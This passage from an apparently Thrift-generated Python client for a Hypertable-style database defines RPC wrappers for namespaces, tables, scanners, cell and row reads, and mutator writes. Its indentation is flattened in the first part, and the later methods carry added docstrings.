self.recv_create_namespace()
def send_create_namespace(self, ns):
self._oprot.writeMessageBegin('create_namespace', TMessageType.CALL, self._seqid)
args = create_namespace_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_create_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = create_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def create_table(self, ns, table_name, schema):
"""
Create a table
@param ns - namespace id
@param table_name - table name
@param schema - schema of the table (in xml)
Parameters:
- ns
- table_name
- schema
"""
self.send_create_table(ns, table_name, schema)
self.recv_create_table()
def send_create_table(self, ns, table_name, schema):
self._oprot.writeMessageBegin('create_table', TMessageType.CALL, self._seqid)
args = create_table_args()
args.ns = ns
args.table_name = table_name
args.schema = schema
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_create_table(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = create_table_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def open_namespace(self, ns):
"""
Open a namespace
@param ns - namespace
@return value is guaranteed to be non-zero and unique
Parameters:
- ns
"""
self.send_open_namespace(ns)
return self.recv_open_namespace()
def send_open_namespace(self, ns):
self._oprot.writeMessageBegin('open_namespace', TMessageType.CALL, self._seqid)
args = open_namespace_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_open_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = open_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "open_namespace failed: unknown result");
def close_namespace(self, ns):
"""
Close a namespace
@param ns - namespace
Parameters:
- ns
"""
self.send_close_namespace(ns)
self.recv_close_namespace()
def send_close_namespace(self, ns):
self._oprot.writeMessageBegin('close_namespace', TMessageType.CALL, self._seqid)
args = close_namespace_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_close_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = close_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def open_scanner(self, ns, table_name, scan_spec, retry_table_not_found):
"""
Open a table scanner
@param ns - namespace id
@param table_name - table name
@param scan_spec - scan specification
@param retry_table_not_found - whether to retry upon errors caused by
drop/create tables with the same name
Parameters:
- ns
- table_name
- scan_spec
- retry_table_not_found
"""
self.send_open_scanner(ns, table_name, scan_spec, retry_table_not_found)
return self.recv_open_scanner()
def send_open_scanner(self, ns, table_name, scan_spec, retry_table_not_found):
self._oprot.writeMessageBegin('open_scanner', TMessageType.CALL, self._seqid)
args = open_scanner_args()
args.ns = ns
args.table_name = table_name
args.scan_spec = scan_spec
args.retry_table_not_found = retry_table_not_found
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_open_scanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = open_scanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "open_scanner failed: unknown result");
def close_scanner(self, scanner):
"""
Close a table scanner
@param scanner - scanner id to close
Parameters:
- scanner
"""
self.send_close_scanner(scanner)
self.recv_close_scanner()
def send_close_scanner(self, scanner):
self._oprot.writeMessageBegin('close_scanner', TMessageType.CALL, self._seqid)
args = close_scanner_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_close_scanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = close_scanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def next_cells(self, scanner):
"""
Iterate over cells of a scanner
@param scanner - scanner id
Parameters:
- scanner
"""
self.send_next_cells(scanner)
return self.recv_next_cells()
def send_next_cells(self, scanner):
self._oprot.writeMessageBegin('next_cells', TMessageType.CALL, self._seqid)
args = next_cells_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_cells(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_cells_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_cells failed: unknown result");
def next_cells_as_arrays(self, scanner):
"""
Parameters:
- scanner
"""
self.send_next_cells_as_arrays(scanner)
return self.recv_next_cells_as_arrays()
def send_next_cells_as_arrays(self, scanner):
self._oprot.writeMessageBegin('next_cells_as_arrays', TMessageType.CALL, self._seqid)
args = next_cells_as_arrays_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_cells_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_cells_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_cells_as_arrays failed: unknown result");
def next_cells_serialized(self, scanner):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- scanner
"""
self.send_next_cells_serialized(scanner)
return self.recv_next_cells_serialized()
def send_next_cells_serialized(self, scanner):
self._oprot.writeMessageBegin('next_cells_serialized', TMessageType.CALL, self._seqid)
args = next_cells_serialized_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_cells_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_cells_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_cells_serialized failed: unknown result");
def next_row(self, scanner):
"""
Iterate over rows of a scanner
@param scanner - scanner id
Parameters:
- scanner
"""
self.send_next_row(scanner)
return self.recv_next_row()
def send_next_row(self, scanner):
self._oprot.writeMessageBegin('next_row', TMessageType.CALL, self._seqid)
args = next_row_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_row(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_row_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_row failed: unknown result");
def next_row_as_arrays(self, scanner):
"""
Alternative interface using array as cell
Parameters:
- scanner
"""
self.send_next_row_as_arrays(scanner)
return self.recv_next_row_as_arrays()
def send_next_row_as_arrays(self, scanner):
self._oprot.writeMessageBegin('next_row_as_arrays', TMessageType.CALL, self._seqid)
args = next_row_as_arrays_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_row_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_row_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_row_as_arrays failed: unknown result");
def next_row_serialized(self, scanner):
"""
Alternate interface returning a buffer of serialized cells for iterating by row
for a given scanner
@param scanner - scanner id
Parameters:
- scanner
"""
self.send_next_row_serialized(scanner)
return self.recv_next_row_serialized()
def send_next_row_serialized(self, scanner):
self._oprot.writeMessageBegin('next_row_serialized', TMessageType.CALL, self._seqid)
args = next_row_serialized_args()
args.scanner = scanner
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_next_row_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = next_row_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "next_row_serialized failed: unknown result");
def get_row(self, ns, table_name, row):
"""
Get a row (convenience method for random access a row)
@param ns - namespace id
@param table_name - table name
@param row - row key
@return a list of cells (with row_keys unset)
Parameters:
- ns
- table_name
- row
"""
self.send_get_row(ns, table_name, row)
return self.recv_get_row()
def send_get_row(self, ns, table_name, row):
self._oprot.writeMessageBegin('get_row', TMessageType.CALL, self._seqid)
args = get_row_args()
args.ns = ns
args.table_name = table_name
args.row = row
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_row(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_row_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_row failed: unknown result");
def get_row_as_arrays(self, ns, name, row):
"""
Alternative interface using array as cell
Parameters:
- ns
- name
- row
"""
self.send_get_row_as_arrays(ns, name, row)
return self.recv_get_row_as_arrays()
def send_get_row_as_arrays(self, ns, name, row):
self._oprot.writeMessageBegin('get_row_as_arrays', TMessageType.CALL, self._seqid)
args = get_row_as_arrays_args()
args.ns = ns
args.name = name
args.row = row
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_row_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_row_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_row_as_arrays failed: unknown result");
def get_row_serialized(self, ns, table_name, row):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- ns
- table_name
- row
"""
self.send_get_row_serialized(ns, table_name, row)
return self.recv_get_row_serialized()
def send_get_row_serialized(self, ns, table_name, row):
self._oprot.writeMessageBegin('get_row_serialized', TMessageType.CALL, self._seqid)
args = get_row_serialized_args()
args.ns = ns
args.table_name = table_name
args.row = row
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_row_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_row_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_row_serialized failed: unknown result");
def get_cell(self, ns, table_name, row, column):
"""
Get a cell (convenience method for random access a cell)
@param ns - namespace id
@param table_name - table name
@param row - row key
@param column - column name
@return value (byte sequence)
Parameters:
- ns
- table_name
- row
- column
"""
self.send_get_cell(ns, table_name, row, column)
return self.recv_get_cell()
def send_get_cell(self, ns, table_name, row, column):
self._oprot.writeMessageBegin('get_cell', TMessageType.CALL, self._seqid)
args = get_cell_args()
args.ns = ns
args.table_name = table_name
args.row = row
args.column = column
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cell(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cell_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cell failed: unknown result");
def get_cells(self, ns, table_name, scan_spec):
"""
Get cells (convenience method for access small amount of cells)
@param ns - namespace id
@param table_name - table name
@param scan_spec - scan specification
@return a list of cells (a cell with no row key set is assumed to have
the same row key as the previous cell)
Parameters:
- ns
- table_name
- scan_spec
"""
self.send_get_cells(ns, table_name, scan_spec)
return self.recv_get_cells()
def send_get_cells(self, ns, table_name, scan_spec):
self._oprot.writeMessageBegin('get_cells', TMessageType.CALL, self._seqid)
args = get_cells_args()
args.ns = ns
args.table_name = table_name
args.scan_spec = scan_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cells(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cells_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cells failed: unknown result");
def get_cells_as_arrays(self, ns, name, scan_spec):
"""
Alternative interface using array as cell
Parameters:
- ns
- name
- scan_spec
"""
self.send_get_cells_as_arrays(ns, name, scan_spec)
return self.recv_get_cells_as_arrays()
def send_get_cells_as_arrays(self, ns, name, scan_spec):
self._oprot.writeMessageBegin('get_cells_as_arrays', TMessageType.CALL, self._seqid)
args = get_cells_as_arrays_args()
args.ns = ns
args.name = name
args.scan_spec = scan_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cells_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cells_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cells_as_arrays failed: unknown result");
def get_cells_serialized(self, ns, name, scan_spec):
"""
Alternative interface returning buffer of serialized cells
Parameters:
- ns
- name
- scan_spec
"""
self.send_get_cells_serialized(ns, name, scan_spec)
return self.recv_get_cells_serialized()
def send_get_cells_serialized(self, ns, name, scan_spec):
self._oprot.writeMessageBegin('get_cells_serialized', TMessageType.CALL, self._seqid)
args = get_cells_serialized_args()
args.ns = ns
args.name = name
args.scan_spec = scan_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_cells_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_cells_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_cells_serialized failed: unknown result");
def refresh_shared_mutator(self, ns, table_name, mutate_spec):
"""
Create a shared mutator with specified MutateSpec.
Delete and recreate it if the mutator exists.
@param ns - namespace id
@param table_name - table name
@param mutate_spec - mutator specification
Parameters:
- ns
- table_name
- mutate_spec
"""
self.send_refresh_shared_mutator(ns, table_name, mutate_spec)
self.recv_refresh_shared_mutator()
def send_refresh_shared_mutator(self, ns, table_name, mutate_spec):
self._oprot.writeMessageBegin('refresh_shared_mutator', TMessageType.CALL, self._seqid)
args = refresh_shared_mutator_args()
args.ns = ns
args.table_name = table_name
args.mutate_spec = mutate_spec
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_refresh_shared_mutator(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = refresh_shared_mutator_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def offer_cells(self, ns, table_name, mutate_spec, cells):
    """Queue a set of cells on a shared periodic mutator (asynchronous write).

    The cells are only placed in a local buffer; persistence is NOT
    guaranteed on return.  For guaranteed durability use open_mutator
    with the set_cells* interface instead.

    @param ns - namespace id
    @param table_name - table name
    @param mutate_spec - mutator specification
    @param cells - set of cells to be written
    """
    self.send_offer_cells(ns, table_name, mutate_spec, cells)
    self.recv_offer_cells()
def send_offer_cells(self, ns, table_name, mutate_spec, cells):
    # Serialize an offer_cells CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('offer_cells', TMessageType.CALL, self._seqid)
    args = offer_cells_args()
    args.ns = ns
    args.table_name = table_name
    args.mutate_spec = mutate_spec
    args.cells = cells
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_offer_cells(self):
    """Read the offer_cells reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = offer_cells_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def offer_cells_as_arrays(self, ns, table_name, mutate_spec, cells):
    """Array-cell variant of offer_cells.

    @param ns - namespace id
    @param table_name - table name
    @param mutate_spec - mutator specification
    @param cells - cells encoded as arrays
    """
    self.send_offer_cells_as_arrays(ns, table_name, mutate_spec, cells)
    self.recv_offer_cells_as_arrays()
def send_offer_cells_as_arrays(self, ns, table_name, mutate_spec, cells):
    # Serialize an offer_cells_as_arrays CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('offer_cells_as_arrays', TMessageType.CALL, self._seqid)
    args = offer_cells_as_arrays_args()
    args.ns = ns
    args.table_name = table_name
    args.mutate_spec = mutate_spec
    args.cells = cells
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_offer_cells_as_arrays(self):
    """Read the offer_cells_as_arrays reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = offer_cells_as_arrays_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def offer_cell(self, ns, table_name, mutate_spec, cell):
    """Queue one cell on a shared periodic mutator (asynchronous write).

    The cell is only placed in a local buffer; persistence is NOT
    guaranteed on return.  For guaranteed durability use open_mutator
    with the set_cells* interface instead.

    @param ns - namespace id
    @param table_name - table name
    @param mutate_spec - mutator specification
    @param cell - cell to be written
    """
    self.send_offer_cell(ns, table_name, mutate_spec, cell)
    self.recv_offer_cell()
def send_offer_cell(self, ns, table_name, mutate_spec, cell):
    # Serialize an offer_cell CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('offer_cell', TMessageType.CALL, self._seqid)
    args = offer_cell_args()
    args.ns = ns
    args.table_name = table_name
    args.mutate_spec = mutate_spec
    args.cell = cell
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_offer_cell(self):
    """Read the offer_cell reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = offer_cell_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def offer_cell_as_array(self, ns, table_name, mutate_spec, cell):
    """Array-cell variant of offer_cell.

    @param ns - namespace id
    @param table_name - table name
    @param mutate_spec - mutator specification
    @param cell - cell encoded as an array
    """
    self.send_offer_cell_as_array(ns, table_name, mutate_spec, cell)
    self.recv_offer_cell_as_array()
def send_offer_cell_as_array(self, ns, table_name, mutate_spec, cell):
    # Serialize an offer_cell_as_array CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('offer_cell_as_array', TMessageType.CALL, self._seqid)
    args = offer_cell_as_array_args()
    args.ns = ns
    args.table_name = table_name
    args.mutate_spec = mutate_spec
    args.cell = cell
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_offer_cell_as_array(self):
    """Read the offer_cell_as_array reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = offer_cell_as_array_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def open_mutator(self, ns, table_name, flags, flush_interval):
    """Open a table mutator and return its id.

    @param ns - namespace id
    @param table_name - table name
    @param flags - mutator flags
    @param flush_interval - auto-flush interval in milliseconds; 0 disables it
    @return mutator id
    """
    self.send_open_mutator(ns, table_name, flags, flush_interval)
    return self.recv_open_mutator()
def send_open_mutator(self, ns, table_name, flags, flush_interval):
    # Serialize an open_mutator CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('open_mutator', TMessageType.CALL, self._seqid)
    args = open_mutator_args()
    args.ns = ns
    args.table_name = table_name
    args.flags = flags
    args.flush_interval = flush_interval
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_open_mutator(self):
    """Read the open_mutator reply and return the new mutator id."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = open_mutator_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.success is not None:
        return result.success
    if result.e is not None:
        raise result.e
    raise TApplicationException(TApplicationException.MISSING_RESULT, "open_mutator failed: unknown result")
def close_mutator(self, mutator, flush):
    """Close a table mutator.

    @param mutator - mutator id to close
    @param flush - flush pending writes before closing
    """
    self.send_close_mutator(mutator, flush)
    self.recv_close_mutator()
def send_close_mutator(self, mutator, flush):
    # Serialize a close_mutator CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('close_mutator', TMessageType.CALL, self._seqid)
    args = close_mutator_args()
    args.mutator = mutator
    args.flush = flush
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_close_mutator(self):
    """Read the close_mutator reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = close_mutator_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def set_cell(self, mutator, cell):
    """Write one cell to the table through an open mutator.

    @param mutator - mutator id
    @param cell - the cell to set
    """
    self.send_set_cell(mutator, cell)
    self.recv_set_cell()
def send_set_cell(self, mutator, cell):
    # Serialize a set_cell CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('set_cell', TMessageType.CALL, self._seqid)
    args = set_cell_args()
    args.mutator = mutator
    args.cell = cell
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_set_cell(self):
    """Read the set_cell reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = set_cell_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def set_cell_as_array(self, mutator, cell):
    """Array-cell variant of set_cell.

    @param mutator - mutator id
    @param cell - cell encoded as an array
    """
    self.send_set_cell_as_array(mutator, cell)
    self.recv_set_cell_as_array()
def send_set_cell_as_array(self, mutator, cell):
    # Serialize a set_cell_as_array CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('set_cell_as_array', TMessageType.CALL, self._seqid)
    args = set_cell_as_array_args()
    args.mutator = mutator
    args.cell = cell
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_set_cell_as_array(self):
    """Read the set_cell_as_array reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = set_cell_as_array_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def set_cells(self, mutator, cells):
    """Write a list of cells to the table through an open mutator.

    A cell with no row key takes the row key of the preceding cell.

    @param mutator - mutator id
    @param cells - list of cells to write
    """
    self.send_set_cells(mutator, cells)
    self.recv_set_cells()
def send_set_cells(self, mutator, cells):
    # Serialize a set_cells CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('set_cells', TMessageType.CALL, self._seqid)
    args = set_cells_args()
    args.mutator = mutator
    args.cells = cells
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_set_cells(self):
    """Read the set_cells reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = set_cells_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def set_cells_as_arrays(self, mutator, cells):
    """Array-cell variant of set_cells.

    @param mutator - mutator id
    @param cells - cells encoded as arrays
    """
    self.send_set_cells_as_arrays(mutator, cells)
    self.recv_set_cells_as_arrays()
def send_set_cells_as_arrays(self, mutator, cells):
    # Serialize a set_cells_as_arrays CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('set_cells_as_arrays', TMessageType.CALL, self._seqid)
    args = set_cells_as_arrays_args()
    args.mutator = mutator
    args.cells = cells
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_set_cells_as_arrays(self):
    """Read the set_cells_as_arrays reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = set_cells_as_arrays_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def set_cells_serialized(self, mutator, cells, flush):
    """Serialized-buffer variant of set_cells.

    @param mutator - mutator id
    @param cells - buffer of serialized cells
    @param flush - flush the mutator after writing
    """
    self.send_set_cells_serialized(mutator, cells, flush)
    self.recv_set_cells_serialized()
def send_set_cells_serialized(self, mutator, cells, flush):
    # Serialize a set_cells_serialized CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('set_cells_serialized', TMessageType.CALL, self._seqid)
    args = set_cells_serialized_args()
    args.mutator = mutator
    args.cells = cells
    args.flush = flush
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_set_cells_serialized(self):
    """Read the set_cells_serialized reply; raises the server-side error if any."""
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
        x = TApplicationException()
        x.read(self._iprot)
        self._iprot.readMessageEnd()
        raise x
    result = set_cells_serialized_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    # PEP 8: test against None by identity, not equality.
    if result.e is not None:
        raise result.e
    return
def flush_mutator(self, mutator):
    """Flush the buffers of an open mutator.

    @param mutator - mutator id
    """
    self.send_flush_mutator(mutator)
    self.recv_flush_mutator()
def send_flush_mutator(self, mutator):
    # Serialize a flush_mutator CALL frame and flush it to the server.
    self._oprot.writeMessageBegin('flush_mutator', TMessageType.CALL, self._seqid)
    args = flush_mutator_args()
    args.mutator = mutator
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
def recv_flush_mutator(self):
    """Read the flush_mutator reply; raises the server-side error if any."""
